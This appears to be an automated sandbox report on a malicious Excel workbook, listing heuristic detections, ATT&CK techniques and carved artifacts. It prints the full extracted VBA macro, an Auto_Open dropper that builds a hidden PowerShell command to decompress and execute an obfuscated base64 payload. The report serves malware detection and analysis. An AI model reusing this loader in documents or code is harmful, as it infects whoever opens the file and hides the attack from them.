Verdict: MALICIOUS (Risk Score: 256)
Malware Insights

MITRE ATT&CK:
- T1059.001 PowerShell
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample contains a VBA macro that is automatically executed upon opening. This macro utilizes the Environ function to gather system information and then constructs a command to execute PowerShell. The PowerShell command is obfuscated and likely intended to download and execute a second-stage payload.
Heuristics (7)

- ClamAV: Doc.Dropper.Agent-6328593-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6328593-0
- VBA project inside OOXML (medium, OOXML_VBA, 5 related findings): Document contains a VBA project; VBA macros present
- Potential Shell call in VBA (critical, OLE_VBA_SHELL). Matched line in script: `Shell owlet, vbHide`
- PowerShell reference in VBA (critical, OLE_VBA_PS). Matched line in script: `If Arch = "AMD64" Then piglet = windir + "\syswow64\windowspowershell\v1.0\powershell.exe" Else`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Auto_Open macro (low, OLE_VBA_AUTO). Matched line in script: `Attribute VB_Name = "Module1" Sub Auto_Open() Dim piglet As String`
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON). Matched line in script: `Arch = Environ("PROCESSOR_ARCHITECTURE") windir = Environ("windir")`
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 4084 bytes | 06f63227ccd8fe0fdcfec7f166e730308361ae70c63c2172a2a901e6001c996d |
Preview of macros.bas (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "Module1"
Sub Auto_Open()
Dim piglet As String
Dim whelp As String
Dim owlet As String
Arch = Environ("PROCESSOR_ARCHITECTURE")
windir = Environ("windir")
If Arch = "AMD64" Then
piglet = windir + "\syswow64\windowspowershell\v1.0\powershell.exe"
Else
piglet = "powershell.exe"
End If
whelp = "zVdRj6M2EH7Pr7AiHhJtWBkbQ7hopbv2VOmkqqq0q/YhygMY00UlJC"
whelp = whelp + "Lkmr22/73MOGNidntq+9SXATPjb74Zj8cm0OyBvZ/Pth+b5t"
whelp = whelp + "P+eOj6xfxX07WmkeK+bJr5cseO56KpNTv1eT88zKUf9OxT2/"
whelp = whelp + "/Yd+ynuuvPefOhaQ56cf3224qd67Znl+vz5fr8stz8Zz/fdi"
whelp = whelp + "bvzdPz8CjJz/mK+3nFRs/Xtxvf1y9T7/vTZ931/8T33uxPpl"
whelp = whelp + "+8RnZRzd/PgsOQyA9lGT69HA0LhzmF6T6aqm7rvj60LNAs/C"
whelp = whelp + "HfGzb/uW6lmLOwHUanY64Nwy/fnVsNlicWHvPTqX/uzrPg8h"
whelp = whelp + "Ac3r3zksxX/BJxDg9pHzFfbtj2m5febHe74AQryi+VHjRmPY"
whelp = whelp + "h1Ngg0HEXCSWEUAEWDKAUoYlAUg1ACPXhDrr1h5IxTGArwxq"
whelp = whelp + "tBFCnQyuFbQvBVRW8aQHOAkiAS+JbCG0cUeBNgotEYpvESBA"
whelp = whelp + "4B2YBdxYmGSn1WjnMsyAfOLUcFvKWYHEWE0pg4j8ZqnAHG0d"
whelp = whelp + "o5WhNJayyBlSRvcUZ20mXI2n01G38brwRvBkkC3QpAOXhLwa"
whelp = whelp + "4CrSxoKGKywzSpCefY45wkjh8SLzzjSHvG1m4SkSukOCZ4FK"
whelp = whelp + "oggeurwERBdpULHyNCR6oiLSJHQNwgF+CnIKwE7BIDQtFq2V"
whelp = whelp + "IGRQppSjJngt5i0saaTLAceUoMSkwTZsjfH3ZfoV+wS3MHr5"
whelp = whelp + "2AOERFiyzAL24XLAvcC4kkgASgUk7TkL3FEw5P0TIK51xJqq"
whelp = whelp + "ZYkQKLYfQ2zlCTHMSOPShS6ZANJcfiKYcX+XhYSMKBxkQS4T"
whelp = whelp + "GEt8K/CWHkkhAXNcnBGIzw5uI3ZIqRI5eJo1j+6xkYqmuHtv"
whelp = whelp + "T+l8Lyy1a33QLXdyoiSqLEvQV5TmFaPqnxghS4JW3jyQjAom"
whelp = whelp + "Drk/63NS3ZZGtgYSq3/WwHBrwMXOrktXMs9DEiPGywXScuXm"
whelp = whelp + "z/9mSKSXsjIvfm/CKyGgu48PwiIe233DeTmBCewL4LQ2z16Q"
whelp = whelp + "RvclbEHjJqq4S0tk8CgyojpjwjRzkkW49NunyDuFsAW7YYvv"
whelp = whelp + "Fclmr1Kja7jK42MLYxYYULGpsv9wMsKloK4d7sRQMJpRRboT"
whelp = whelp + "2/GFvkVhq3PTbVLCOTUSAyNgC7TRUNby4nMBeP9wK0uaA4Rq"
whelp = whelp + "YYZeyMub0UvUa5aeZj7aakxa2WY63hAa48H5kkBQp7W0o9AO"
whelp = whelp + "76/XRruJLCsyxLHID4WklpqAN7uIIPewOQvp0ipsgetZhs6X"
whelp = whelp + "b8KGyjdeelPYrc2YNHwnhGpcgZjfEe5roybt3UdX7b/jMymR"
whelp = whelp + "xynG9m1aFji6B+4JugZmFjhsFJ339v2l/65zBaDl/v7pbsd7"
whelp = whelp + "jaXu/WW3u53i2Cy/3TYRhIsVjeBfVyxYap26DerVi0ZH+ww7"
whelp = whelp + "kP23PTbP6cBV/wcuz9GQwZWgWXFTzgUvzY510fPjbGHFn4aP"
whelp = whelp + "ShLRncnTn/Cw=="
owlet = piglet + " -NoP -NonI -W Hidden -Command ""Invoke-E"
owlet = owlet + "xpression $(New-Object IO.StreamReader ($(New-Ob"
owlet = owlet + "ject IO.Compression.DeflateStream ($(New-Object "
owlet = owlet + "IO.MemoryStream (,$([Convert]::FromBase64String("
owlet = owlet + "\"" " & whelp & " \"" )))), [IO.Compression.Compre"
owlet = owlet + "ssionMode]::Decompress)), [Text.Encoding]::ASCII"
owlet = owlet + ")).ReadToEnd();"""
Shell owlet, vbHide
End Sub
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
```
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 18944 bytes | a28ec87a32f3a2a9ccf029c268f6f5b19e99fbe562a28c6a82f8fabace475baa |